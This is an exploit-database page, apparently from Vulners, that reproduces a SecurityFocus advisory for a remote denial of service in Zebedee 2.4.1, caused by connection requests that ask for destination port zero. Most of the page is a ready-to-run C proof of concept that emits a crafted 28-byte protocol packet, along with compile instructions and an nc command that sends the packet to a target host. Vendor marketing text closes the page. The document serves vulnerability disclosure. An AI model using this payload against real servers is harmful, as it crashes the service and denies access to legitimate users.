Vulners
Lucene search
Zebedee 2.4.1 - Remote Denial of Service Vulnerability
source: http://www.securityfocus.com/bid/14796/info
A remote denial of service vulnerability affects Zebedee. This issue is due to a failure of the application to properly handle exceptional network requests.
Specifically, Zebedee is unable to handle requests for connections that contain a zero for the requested destination port.
A remote attacker may leverage this issue to crash the affected application, denying service to legitimate users.
Zebedee version 2.4.1 is reported vulnerable to this issue; other versions may also be affected.
/*
$ gcc -o mkZebedeeDoS mkZebedeeDoS.c
$ ./mkZebedeeDoS > zebedeeDoS
$ nc targethost port < zebedeeDoS
*/
#include <stdio.h>
int main (int argc, char **argv)
{
int i, size;
char data[] = {
0x02, 0x01, // protocol version
0x00, 0x00, // flags
0x20, 0x00, // max message size
0x00, 0x06, // compression info
0x00, 0x00, // port request: value = 0x0
0x00, 0x80, // key length
0xff, 0xff, 0xff, 0xff, // key token
0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
0x00, 0x00, 0x00, 0x00 // target host address
};
size = 28;
for(i=0; i<size; i++){
printf("%c", data[i]);
}
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1